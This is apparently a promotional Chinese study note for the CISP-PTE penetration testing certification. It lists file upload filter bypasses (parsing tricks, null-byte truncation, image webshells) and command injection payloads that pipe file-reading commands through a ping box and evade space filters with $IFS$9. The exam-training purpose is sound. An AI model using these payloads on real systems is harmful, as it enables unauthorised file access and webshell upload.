新的一年开始了，因为有免面试的优势，考CISP-PTE渗透测试的越来越多了，好多人也买了资料来看，CISP-PTE整体上讲还是比较容易考的，现在给大家介绍部分的的知识点。2022年CISP-PTE考证相关知识点详解。

　　4.2 文件上传

　　• 解法：

　　• 1.php[空格] -> 1.php windows特性

　　• 1.php……(4000+)…. -> 1.php windows/linux

　　• 1.php.xxx -> 1.php apache解析

　　• 1.jpg/.php -> 1.php nginx解析(上传之后解析)

　　• 1.pphphp -> 1.php 单次消除

　　• Path=../upload/1.php%00 post:name=1.jpg -> ../upload/1.php%00/1.jpg -> ../upload/1.php

　　• 特殊后缀名：.phtml/.php4/.php5

　　• 优先使用图片马

　　4.3 命令执行

　　• 多数情况都是docker模拟的linux环境，但很可能存在waf

　　• 基本都是给你一个框，里面有个ping或者其他小小的命令

　　• 管道符了解一下 -> |

　　• ping 127.0.0.1 | cat ../1.txt

　　• ?了解一下

　　• Ping 127.0.0.1 | cat ../1.?xt

　　• 不允许有空格，$IFS$9了解一下

　　• ping 127.0.0.1|$IFS$9cat$IFS$9../1.?xt

　　• $IFS绕空格 后面跟的是数字字母时需要加$9

赛虎学院作为CISP-PTE培训机构，通过率常年保持在99 %以上，各地的学员皆可报名，每个月都能安排培训，就近选择培训地点。

扫码领取资料：